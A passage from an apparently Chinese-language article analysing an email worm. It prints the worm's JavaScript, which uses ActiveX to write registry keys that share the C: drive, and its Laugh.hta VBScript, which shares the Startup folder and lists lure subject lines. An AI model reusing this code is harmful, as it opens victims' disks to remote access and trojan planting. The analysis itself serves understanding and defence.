function f() //改写注册表的函数
{
var aa,ss;
aa=document.applets[0];
aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
aa.createInstance();
ss=aa.GetObject();
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network
\\LanMan\\C$\\Flags",302,"REG_DWord");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network
\\LanMan\\C$\\Type",0,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network
\\LanMan\\C$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000); //每过1000毫秒就再次递归调用f()
}
init(); //调用函数
〈/script〉
〈/BODY〉〈/Html〉
这封邮件就是利用了MS.ActiveX元件的写注册表的功能,只要你一读这封信,它就会在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionNetwork\LanMan中添加了一个键值C$,并且将C盘改为完全共享!这样黑客可以用SMB扫描器直接登陆你的C盘,他可以在硬盘中随意拷贝文件,删除文件,添加文件……并且可以给你上传木马,永久而全面地控制你的机器。
再来看一看附件Laugh.hta吧。我查看了一下“文件类型”,发现“.hta”后缀名其实是HTML Application文件,可以由Mshta.exe解释执行。看来也是和WSH、VBS一样的文本文件,就将它导出为Txt文件——哈哈!全看到了!
〈html〉
〈script language=vbs〉
On Error Resume Next· 容错语句,避免程序崩溃
set aa=CreateObject("WScript.Shell")·建立WScript对象
Set fs = CreateObject("Scripting.FileSystemObject")·建立文件系统对象
Set dir1 = fs.GetSpecialFolder(0)·得到Windows路径
Set dir2 = fs.GetSpecialFolder(1)·得到System路径
dir1=dir1+"\START MENU\PROGRAMS\启动" aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetwork\
LanMan\S$\Flags",302,"REG_DWORD"·写入Dword值Flags,这是共享类型的标志
aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetwork\
LanMan\S$\Type",0,"REG_DWORD"·写入Dword值Type
aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetwork\
LanMan\S$\Path",dir1·写入共享资源的绝对路径
a=10
Set Os = CreateObject("Scriptlet.TypeLib")·建立自定义枚举对象
doc="“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”“How about have dinner with me together?”"
[1] [2]
·一堆垃圾码,以备写入目标文件
(出处:http://www.sheup.com)
[1] [2]